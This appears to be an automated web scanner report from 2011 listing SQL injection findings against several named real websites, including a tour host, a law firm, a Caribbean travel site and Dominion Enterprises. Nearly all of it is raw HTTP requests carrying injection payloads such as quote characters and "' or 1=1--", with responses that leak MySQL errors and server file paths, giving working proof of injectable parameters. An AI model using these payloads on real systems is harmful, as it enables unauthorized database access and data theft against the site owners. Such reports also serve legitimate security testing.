GET /?scs_sid=2546''&scs_tid=-1+OR+17-7%3d10 HTTP/1.1 Host: tours.sapha.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_2546_1=68004 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:08:24 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 102 <html><body><h1>An error has occurred.</h1><p>Please contact support for assistance.</p></body>< |
Severity: | High |
Confidence: | Tentative |
Host: | http://tours.sapha.com |
Path: | / |
GET /?scs_sid=2546&scs_tid= Host: tours.sapha.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:05:36 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 102 <html><body><h1>An error has occurred.</h1><p>Please contact support for assistance.</p></body>< |
GET /?scs_sid=2546&scs_tid= Host: tours.sapha.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:05:36 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 1022 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Tour Unavailable</title> <style type="text/css"> body{ margin:0; padding:0; } a{ color:#9E2626; } a:hover{ text-decoration:none; } .left { float:left; } #container { width:640px; margin:50px auto 20px auto; padding:0; } #container #content { margin-left: 200px; } </style> </head> <body> <div id="container"> <img class="left" src="images/alert_175x162 <div id="content"> <h1>Oops!</h1> <p>The tour you have requested does not exist or is not currently available. Please <a href="mailto:support </div> </div> </body> </html> |
Severity: | High |
Confidence: | Firm |
Host: | http://tours.sapha.com |
Path: | / |
GET /?scs_sid=2546&scs_tid Host: tours.sapha.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=110075 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:06:38 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 429 </td></tr></table><b ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.brownrudnick |
Path: | /nr/alertsArchv.asp |
GET /nr/alertsArchv.asp?Year Cookie: ASPSESSIONIDSSSASTRS Host: www.brownrudnick.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5 Accept: */* |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Fri, 06 May 2011 18:47:11 GMT X-Powered-By: ASP.NET MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 13913 Content-Type: text/html Set-Cookie: ASPSESSIONIDSQRDRRTT Cache-control: private <html> <head> <meta http-equiv="Content <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>Brown Rudnick - Alerts and Newsletters - ...[SNIP]... </i> Microsoft OLE DB Provider for ODBC Drivers<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.caribbean |
Path: | /accommodation2.php |
GET /accommodation2.php?id Host: www.caribbean-ocean.com Proxy-Connection: keep-alive Referer: http://www.caribbean User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=lj6iq5k4nc |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:51 GMT Server: Apache/2.2.4 (Linux/SUSE) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 10042 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL ...[SNIP]... </textarea> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james <html> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.caribbean |
Path: | /accommodation2.php |
GET /accommodation2.php?id=/1'8289 HTTP/1.1 Host: www.caribbean-ocean.com Proxy-Connection: keep-alive Referer: http://www.caribbean User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=lj6iq5k4nc |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:37:44 GMT Server: Apache/2.2.4 (Linux/SUSE) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 10070 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/1\'8289' at line 1<br /><br /><textarea rows="10" cols="10 ...[SNIP]... </textarea> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james <html> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.caribbean |
Path: | /get-image.php |
GET /get-image.php?id=18696' HTTP/1.1 Referer: http://www.caribbean User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.caribbean-ocean.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 16:00:06 GMT Server: Apache/2.2.4 (Linux/SUSE) Content-Length: 934 Content-Type: image/jpg 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL ...[SNIP]... </textarea> Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james Warning: fopen(../images/not-found ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.caribbean |
Path: | /get-image.php |
GET /get-image.php?id=1/1'8696 HTTP/1.1 Referer: http://www.caribbean User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.caribbean-ocean.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 16:00:17 GMT Server: Apache/2.2.4 (Linux/SUSE) Content-Length: 940 Content-Type: image/jpg 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'8696' at line 1<br /><br /><textarea rows="10" cols="100" ...[SNIP]... </textarea> Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james Warning: fopen(../images/not-found ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.caribbean |
Path: | /luxury%20Barbados |
GET /luxury%20Barbados Host: www.caribbean-ocean.com Proxy-Connection: keep-alive Referer: http://www.caribbean User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=lj6iq5k4nc |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:57 GMT Server: Apache/2.2.4 (Linux/SUSE) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 6887 <html> <head> <title>Luxury and exclusive Caribbean holidays in luxury</title> <meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD ...[SNIP]... <br /> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br /> ...[SNIP]... </textarea> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james </div> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.caribbean |
Path: | /luxury%20Jamaica |
GET /luxury%20Jamaica Host: www.caribbean-ocean.com Proxy-Connection: keep-alive Referer: http://www.caribbean User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=lj6iq5k4nc |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:37:25 GMT Server: Apache/2.2.4 (Linux/SUSE) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 6888 <html> <head> <title>Luxury and exclusive Caribbean holidays in luxury</title> <meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD ...[SNIP]... <br /> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br /> ...[SNIP]... </textarea> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james </div> ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/Advertiser |
GET /main/do/Advertiser Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:37:23 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=bdf614ab37 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:37:23 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 32708 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Home</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Home"> <meta name="keywords" content="Home"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <script language="javascript" type="text/javascript"> var IsIPad = false; function QueryStringIsRequest Queries = window.location.search if (Queries == "" || Queries == null) { return false; } else { QueryArray = Queries.split("&"); for (i = 0; i < QueryArray.length; i++) { QueryValue = QueryArray[i].split("="); if (QueryValue[0] == DirectToFullSite) { if (QueryValue[1] == "fs24lmj09") return true; else return false; } else return false; } } } function IsMobileRedirection() { var agent = navigator.userAgent var IsMobile = false; if ((agent.indexOf('absinthe (agent.indexOf('albacore' ...[SNIP]... |
GET /main/do/Advertiser Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:37:23 GMT X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=e7b89d9d22 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:37:23 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Length: 0 Content-Type: text/html Set-Cookie: TSa27990=17226455681 |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/Advertiser |
GET /main/do/Advertiser Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:57 GMT X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=dba9e76780 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:35:57 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Set-Cookie: TSa27990=a6085532e06 Content-Length: 34603 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Advertising User Agreement</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Advertising User Agreement"> <meta name="keywords" content="Advertising User Agreement"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <link rel="stylesheet" href="http://www <link rel="stylesheet" href="http://www <!-- calendar stylesheet --> <link rel="stylesheet" type="text/css" media="all" href="http://www <!-- main calendar program --> <script type="text/javascript" src="http://www <!-- language for the calendar --> <script type="text/javascript" src="http://www <!-- the following script defines the Calendar.setup helper function, ...[SNIP]... |
GET /main/do/Advertiser Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:57 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=6fbc3a6086 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:35:57 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 34603 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Advertising User Agreement</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Advertising User Agreement"> <meta name="keywords" content="Advertising User Agreement"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <link rel="stylesheet" href="http://www <link rel="stylesheet" href="http://www <!-- calendar stylesheet --> <link rel="stylesheet" type="text/css" media="all" href="http://www <!-- main calendar program --> <script type="text/javascript" src="http://www <!-- language for the calendar --> <script type="text/javascript" src="http://www <!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. --> <script type="text/javascript ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/Careers |
GET /main/do/Careers72254876'%20or%201%3d1-- Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:36:43 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=ad448786cf Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:36:43 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 32708 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Home</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Home"> <meta name="keywords" content="Home"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <script language="javascript" type="text/javascript"> var IsIPad = false; function QueryStringIsRequest Queries = window.location.search if (Queries == "" || Queries == null) { return false; } else { QueryArray = Queries.split("&"); for (i = 0; i < QueryArray.length; i++) { QueryValue = QueryArray[i].split("="); if (QueryValue[0] == DirectToFullSite) { if (QueryValue[1] == "fs24lmj09") return true; else return false; } else return false; } } } function IsMobileRedirection() { var agent = navigator.userAgent var IsMobile = false; if ((agent.indexOf('absinthe (agent.indexOf('albacore' ...[SNIP]... |
GET /main/do/Careers72254876'%20or%201%3d2-- Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:36:43 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=7498864a68 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:36:43 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/Careers |
GET /main/do/Careers HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:29 GMT X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=50020d3c5d Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:35:29 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Set-Cookie: TSa27990=46792d7b37b Content-Length: 19076 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Careers</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Careers"> <meta name="keywords" content="Careers"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <link rel="stylesheet" href="http://www <link rel="stylesheet" href="http://www <!-- calendar stylesheet --> <link rel="stylesheet" type="text/css" media="all" href="http://www <!-- main calendar program --> <script type="text/javascript" src="http://www <!-- language for the calendar --> <script type="text/javascript" src="http://www <!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines o ...[SNIP]... |
GET /main/do/Careers HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:29 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=f73a685d8d Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:35:29 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 19076 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Careers</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Careers"> <meta name="keywords" content="Careers"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <link rel="stylesheet" href="http://www <link rel="stylesheet" href="http://www <!-- calendar stylesheet --> <link rel="stylesheet" type="text/css" media="all" href="http://www <!-- main calendar program --> <script type="text/javascript" src="http://www <!-- language for the calendar --> <script type="text/javascript" src="http://www <!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. --> <script type="text/javascript" src="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/Careers |
GET /main/do/Careers HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:07 GMT X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=e2553f7484 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:35:07 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Set-Cookie: TSa27990=1e404d82997 Content-Length: 19076 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Careers</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Careers"> <meta name="keywords" content="Careers"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <link rel="stylesheet" href="http://www <link rel="stylesheet" href="http://www <!-- calendar stylesheet --> <link rel="stylesheet" type="text/css" media="all" href="http://www <!-- main calendar program --> <script type="text/javascript" src="http://www <!-- language for the calendar --> <script type="text/javascript" src="http://www <!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines o ...[SNIP]... |
GET /main/do/Careers HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:07 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=ecde5f56d9 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:35:07 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 19076 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Careers</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Careers"> <meta name="keywords" content="Careers"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <link rel="stylesheet" href="http://www <link rel="stylesheet" href="http://www <!-- calendar stylesheet --> <link rel="stylesheet" type="text/css" media="all" href="http://www <!-- main calendar program --> <script type="text/javascript" src="http://www <!-- language for the calendar --> <script type="text/javascript" src="http://www <!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. --> <script type="text/javascript" src="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/For_Businesses |
GET /main/do/For_Businesses16640137'%20or%201%3d1-- Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.dominione User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
